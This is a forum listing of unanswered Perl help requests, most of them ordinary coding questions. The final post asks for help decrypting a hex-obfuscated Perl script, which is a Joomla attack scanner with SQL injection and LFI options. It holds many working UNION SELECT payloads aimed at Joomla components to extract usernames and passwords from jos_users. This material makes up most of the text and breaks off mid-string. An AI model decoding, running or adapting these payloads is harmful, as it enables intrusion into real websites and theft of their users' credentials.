192 Unanswered Topics

Remove Filter
Member Avatar for
Member Avatar for find_1

sub runDir($$); sub runDir($$) { my $prefix = shift @_; my $dir = shift @_; opendir(DIR, $dir) or die $!; my @entries = readdir(DIR); close(DIR); foreach my $file (@entries) { next if ($file =~ /^\.+$/); if ( -d $dir . '/' . $file) { runDir($prefix . $file .'_', $dir . …

0
189
Member Avatar for gerald_8

sir good day. i have question regarding PLC in DOL i can start the motor but i cannot stop it using remote in cpu

0
178
Member Avatar for vivek.vivek

I have written a code to automate my webpage to do a search and download a report. Till selection of the report everything works fine. But download click is not working after clicking checkbox. It works well if i keep the download click bust before checkbox select. But I need …

0
276
Member Avatar for analys

Hi, I'm new to perl and I'm stuck at regular expression on which to get the data of deck, super and trial from an array. I have an input file as the following : `deck { @STATE = "this is low"; @ACCESS = "RW"; } [6:0]; super { @STATE = …

0
218
Member Avatar for Da_Noles

Hi all, I am trying to create a script that I can run and edit a user's settings on their excel. IE: the script will edit the user's options by enabling macros and adding in the add-on. Anyone ever work on something like this?

0
90
Member Avatar for Linda_4

Hi - Not sure If I posted this in the proper forum - I installed upload-lite script here - http://www.perlscriptsjavascripts.com/perl/upload_lite/users_guide.html and it is great for the simple use I want. I'd like to add the submitters name and email address to the form. Could someone please send me the code …

0
89
Member Avatar for dinkar_1

I have a multiselect dropdown which has 8 colors in a hash %all_colors: my %all_colors = ( 1 => 'Red', 2 => 'Yellow', 3 => 'Orange', 4 => 'Blue', 5 => 'Black', 6 => 'Brown', 7 => 'Green', 8 => 'White', ); I have put it in a dropdown like …

0
112
Member Avatar for Roya Ahmed
0
86
Member Avatar for perly

Hi, I tried parsing a multi-record genbank file (from this site: http://biopython.org/DIST/docs/tutorial/examples/ls_orchid.gbk) using the code below. The code returned an error: readline() on unopened filehandle at parser.pl line 62. The code: #!/usr/local/bin/perl -w use strict; my $record; print "Please type in the name of a file\n"; my $file = <STDIN>; …

0
148
Member Avatar for munitjsr2

**test.html** <!DOCTYPE html> <html> <head> <title>Database test</title> <link rel="stylesheet" type="text/css" href="test.css"> <script> function validateForm(n,mes) { valid=true; var x=n.value; var errn="error_"+n.id; var email = document.getElementById('EMAIL').value; var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; //alert(errn); if (x==null || x=="" || x.trim()=="") { document.getElementById(errn).innerHTML=mes; valid=false; } else { document.getElementById(errn).innerHTML=""; if(n.id == 'EMAIL') { if (!filter.test(email)) { document.getElementById(errn).innerHTML="Please …

0
110
Member Avatar for Everyauction

Hello Fan's, I (re)started a rather old Project of mine about a Year ago, but shortly before it's Version1.0, the Fellow ordered to implement a powerful indexing-system, dropped out and left me with a partly unfinished piece of work. For more than a decade, I have been designing several editions …

0
178
Member Avatar for Everyauction

Dear Readers, 10 Years ago, Matt Hahnfeld (Everysoft.com) released the legendary EveryAuction Version 1.53 Perl Auction Script, the last Version of a serie of simple, but very popular source, still used worldwide in many different forms of applications. To honor this, I soon plan to release the new EveryAuction 2.53 …

0
120
Member Avatar for Cupidvogel

I am trying to send sms through Way2sms using Perl LWP. The login part is being successful, after which I save the cookies to a local file. The welcome page after being logged in shows a Send SMS link, clicking on which one is redirected to another page with two …

0
104
Member Avatar for hp51185

Hello I am trying to run a perl script on tomcat server. I am putting the incoming http request in a variable data which collects the headers as well as the text file attachment data. The code is like this : .... while(<>){ $data = $data . $_ ; } …

0
109
Member Avatar for Faith.Moraa

Hello guys, I'm trying to find a way of sending MT messages to subscribers from my perl script. My shortcode is 1111(EXAMPLE), and I have three messages I want to send. Obviously, when a user sends a message to my shortcode, they receive a first response; ButI need them to …

0
82
Member Avatar for 2teez

One of the finest initiative was the full documentation bundled with every version of Perl Programming language. Using the plain old documentation (*pod*) utility called *perldoc* one can literally read or learn the programming language without another book. E.g perldoc perl gives you the Name of the perl language Interpreter, …

0
142
Member Avatar for jimmyali

> can someone please send me a perl script to find solution of following problem:- input a random **DNA sequence** , cut the DNA sequence randomly into three** fragmented sequence** ,from these fragmented sequence** retrace the DNA sequence** back . for eg. input string=AGCTAACCTTCAG fragments= TAACC,AGCT,TCAG,CCTT We want to retrace …

0
78
Member Avatar for marComm

I need to allow users to upload an image via form. I based my script upon a template that someon ein my company had used in the past, but the upload part is not working. Can anyone see anything that might be causing the problem? Is it the file upload …

0
91
Member Avatar for rdhoggan

Hey all, I have built a Perl script for parsing XML in an email message attachmen. Essentially the script works when there is one email message in the inbox but breaks when there are 2+. The "unblessed reference" error is on the line that uses XMLin. I am not sure …

0
74
Member Avatar for SergioQ

So first off, I love this forum. Am more of a user than an answerer since I am only at that level, but this place has saved me so many times, and I hope it can do it once more. Am using old Perl code that uses Sendmail. Sadly since …

0
103
Member Avatar for vasuv

Hi, Some jobs got scheduled.let us take an example of 5 jobs. first 4 jobs got scheduled in one server(assume it as A).last jobs got scheduled in another server(assume it as B).so the requirement here is once the 4 jobs got completed in server A, then we need to connect …

0
92
Member Avatar for kodpark

hi team...I need help for connection sybase server emergency... i will start perl programming for our company software ourselves…I need dbi driver installation guide,installation setup file and etc. i m using dzsoft perl editor (5.8.7.3),and i have apache server 2.0.64 (win) i try to connect sybase server but i couldnt …

0
100
Member Avatar for Cupidvogel

Hi, a program requires one to enter a given number of strings, and for each string, the program has to output the number of permutations possible. We all know that if a string S of length l has a type of one letter, b type of another, c type of …

0
76
Member Avatar for pravin pawar

How can i find the mac address of all computers and which loop i used for [CODE][B]#!/usr/bin/perl $file ="/etc/sysconfig/network-scripts/ifcfg-eth0"; open (MYFILE, "$file"); $file1 = <MYFILE>; while ($file1 ne "") { chomp ($file1); $file1 = <MYFILE>; for ($values = 0; $values < 5; $values++) { if ($file1 =~ /HWADDR/){ @values = …

0
80
Member Avatar for biojet

Hi everyone, I am trying to idetify the position between start_posi and end_posi and I want to have all information of this position. For Example: [CODE]input 1 : num start end 1 1234 1238 [/CODE] [CODE]input 2 : num position information 1 1236 ACGT [/CODE] [CODE]out put 1234 1236 1238 …

0
73
Member Avatar for axn

for multiple scroll_list I used code below. [CODE]print scrolling_list(-name=>'services', -values=>\@field3, -multiple=>'true', -size=>25);[/CODE] How can I fix for a maximum of 3 selects since I have more than 50 scrolls.

0
79
Member Avatar for roja12345

Hi Perl guru's I'm new on Perl i need help for below mentioned issue. I have 4 flat files with 4 columns like below: eg: 000360112720C17506721111130602 m 1L 1008968860482 I have one excel file with 12 columns I have converted the excel file into text with comma seperated. Now i …

0
80
Member Avatar for sarabb

HI I have this perl need to be decrypted. any one help? with thanks [CODE]#!/usr/bin/perl use LWP::UserAgent;system("\x63\x6f\x6c\x6f\x72\x20\x61");system("\x63\x6c\x73");print "\x0a\x20\x20\x7c\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7c\x0a";print "\x20\x20\x7c\x53\x70\x79\x20\x4a\x6f\x6f\x6d\x6c\x61\x20\x53\x63\x61\x6e\x6e\x65\x72\x20\x57\x69\x6e\x33\x32\x7c\x0a";print "\x20\x20\x7c\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7c\x0a\x0a\x0a\x0a";print "\x5b\x2a\x5d\x20\x43\x72\x65\x61\x74\x65\x64\x20\x42\x79\x20\x53\x70\x79\x62\x6f\x79\x0a";print "\x5b\x2a\x5d\x45\x6d\x61\x69\x6c\x3a\x62\x30\x30\x6f\x40\x77\x69\x6e\x64\x6f\x77\x73\x6c\x69\x76\x65\x2e\x63\x6f\x6d\x0a\x0a\x0a";print "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x4f\x70\x74\x69\x6f\x6e\x73\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0a\x0a";print "\x5b\x2b\x5d\x31\x2d\x20\x53\x51\x4c\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x0a\x5b\x2b\x5d\x32\x2d\x20\x4c\x46\x49\x0a";print "\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0a";print "\x0a\x5b\x2b\x5d\x20\x50\x75\x74\x20\x59\x6f\x75\x72\x20\x43\x68\x6f\x69\x63\x65\x20\x48\x65\x72\x65\x3a";$OO=<>;chomp $OO;if($OO==1){print "\x0a\x59\x6f\x75\x72\x20\x43\x68\x6f\x69\x63\x65\x20\x57\x61\x73\x20\x53\x51\x4c\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x0a\x0a\x0a\x0a";print "\x5b\x2b\x5d\x20\x50\x75\x74\x20\x59\x6f\x75\x72\x20\x54\x61\x72\x67\x65\x74\x20\x57\x65\x62\x73\x69\x74\x65\x20\x48\x65\x72\x65\x20\x3a";$OOOO=<>;chomp $OOOO;@OOO=("\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x61\x6c\x61\x6d\x65\x64\x61\x26\x63\x6f\x6e\x74\x72\x6f\x6c\x6c\x65\x72\x3d\x63\x6f\x6d\x6d\x65\x6e\x74\x73\x26\x74\x61\x73\x6b\x3d\x65\x64\x69\x74\x26\x73\x74\x6f\x72\x65\x69\x64\x3d\x2d\x31\x2b\x75\x6e\x69\x6f\x6e\x2b\x61\x6c\x6c\x2b\x73\x65\x6c\x65\x63\x74\x2b\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x62\x32\x70\x6f\x72\x74\x66\x6f\x6c\x69\x6f\x26\x63\x3d\x2d\x31\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x33\x2c\x34\x2c\x35\x20\x46\x52\x4f\x4d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x71\x75\x65\x73\x74\x69\x6f\x6e\x26\x63\x61\x74\x49\x44\x3d\x32\x31\x5c\x27\x20\x61\x6e\x64\x2b\x31\x3d\x30\x20\x75\x6e\x69\x6f\x6e\x20\x61\x6c\x6c\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x38\x2c\x39\x20\x66\x72\x6f\x6d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d\x25\x32\x30","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x4e\x6f\x47\x65\x26\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x65\x73\x65\x61\x72\x63\x68\x26\x73\x65\x61\x72\x63\x68\x49\x64\x3d\x2d\x31\x2b\x75\x6e\x69\x6f\x6e\x2b\x73\x65\x6c\x65\x63\x74\x2b\x31\x2c\x67\x72\x6f\x75\x70\x5f\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x74\x69\x6d\x65\x72\x65\x74\x75\x72\x6e\x73\x26\x76\x69\x65\x77\x3d\x74\x69\x6d\x65\x72\x65\x74\x75\x72\x6e\x73\x26\x69\x64\x3d\x2d\x37\x2b\x75\x6e\x69\x6f\x6e\x2b\x61\x6c\x6c\x2b\x73\x65\x6c\x65\x63\x74\x2b\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x74\x69\x6d\x65\x72\x65\x74\x75\x72\x6e\x73\x26\x76\x69\x65\x77\x3d\x74\x69\x6d\x65\x72\x65\x74\x75\x72\x6e\x73\x26\x69\x64\x3d\x37\x20\x41\x4e\x44\x20\x31\x3d\x32\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x2c\x31\x37\x2c\x31\x38\x2c\x31\x39\x2c\x32\x30\x2c\x32\x31\x2c\x32\x32\x2c\x32\x33\x20\x66\x72\x6f\x6d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x74\x65\x63\x68\x66\x6f\x6c\x69\x6f\x26\x76\x69\x65\x77\x3d\x74\x65\x63\x68\x66\x6f\x6c\x69\x6f\x64\x65\x74\x61\x69\x6c\x26\x63\x61\x74\x69\x64\x3d\x2d\x31\x20\x75\x6e\x69\x6f\x6e\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x20\x66\x72\x6f\x6d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x68\x6d\x63\x6f\x6d\x6d\x75\x6e\x69\x74\x79\x26\x76\x69\x65\x77\x3d\x66\x6e\x64\x5f\x68\x6f\x6d\x65\x26\x69\x64\x3d\x31\x35\x35\x20\x61\x6e\x64\x20\x31\x3d\x32\x20\x75\x6e\x69\x6f\x6e\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x20\x66\x72\x6f\x6d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6c\x69\x73\x74\x69\x6e\x67\x26\x74\x61\x73\x6b\x3d\x62\x72\x6f\x77\x73\x65\x26\x63\x61\x74\x65\x67\x6f\x72\x79\x5f\x69\x64\x3d\x2d\x31\x2b\x75\x6e\x69\x6f\x6e\x2b\x73\x65\x6c\x65\x63\x74\x2b\x31\x2c\x32\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x34\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x70\x65\x6f\x70\x6c\x65\x26\x63\x6f\x6e\x74\x72\x6f\x6c\x6c\x65\x72\x3d\x70\x65\x6f\x70\x6c\x65\x26\x74\x61\x73\x6b\x3d\x64\x65\x74\x61\x69\x6c\x73\x26\x69\x64\x3d\x2d\x31\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x33\x20\x46\x52\x4f\x4d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x26\x74\x61\x73\x6b\x3d\x62\x6c\x6f\x67\x63\x61\x74\x65\x67\x6f\x72\x79\x26\x69\x64\x3d\x36\x30\x26\x49\x74\x65\x6d\x69\x64\x3d\x39\x39\x39\x39\x39\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x33\x2c\x34\x2c\x35\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x64\x69\x72\x66\x72\x6d\x26\x74\x61\x73\x6b\x3d\x6c\x69\x73\x74\x41\x6c\x6c\x26\x63\x61\x74\x69\x64\x3d\x2d\x34\x2b\x75\x6e\x69\x6f\x6e\x2b\x73\x65\x6c\x65\x63\x74\x2b\x31\x2c\x32\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x2c\x31\x37\x2c\x31\x38\x2c\x31\x39\x2c\x32\x30\x2c\x32\x31\x2c\x32\x32\x2c\x32\x33\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6d\x61\x69\x6c\x74\x6f\x26\x74\x6d\x70\x6c\x3d\x6d\x61\x69\x6c\x74\x6f\x26\x61\x72\x74\x69\x63\x6c\x65\x3d\x35\x35\x30\x35\x31\x33\x2b\x61\x6e\x64\x2b\x31\x3d\x32\x2b\x75\x6e\x69\x6f\x6e\x2b\x73\x65\x6c\x65\x63\x74\x2b\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d\x26\x49\x74\x65\x6d\x69\x64\x3d\x31","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6d\x61\x72\x6b\x65\x74\x70\x6c\x61\x63\x65\x26\x70\x61\x67\x65\x3d\x73\x68\x6f\x77\x5f\x63\x61\x74\x65\x67\x6f\x72\x79\x26\x63\x61\x74\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x32\x2c\x33\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6e\x65\x6f\x72\x65\x66\x65\x72\x65\x6e\x63\x65\x73\x26\x49\x74\x65\x6d\x69\x64\x3d\x32\x37\x26\x63\x61\x74\x69\x64\x3d\x39\x39\x38\x38\x37\x37\x36\x36\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x5f\x69\x64\x3d\x31\x3d\x31\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x71\x75\x69\x7a\x26\x74\x61\x73\x6b\x3d\x75\x73\x65\x72\x5f\x74\x73\x74\x5f\x73\x68\x77\x26\x49\x74\x65\x6d\x69\x64\x3d\x36\x31\x26\x74\x69\x64\x3d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x30\x2c\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6d\x63\x71\x75\x69\x7a\x26\x74\x61\x73\x6b\x3d\x75\x73\x65\x72\x5f\x74\x73\x74\x5f\x73\x68\x77\x26\x49\x74\x65\x6d\x69\x64\x3d\x34\x32\x26\x74\x69\x64\x3d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x33\x61\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x78\x66\x61\x71\x26\x74\x61\x73\x6b\x3d\x61\x6e\x73\x77\x65\x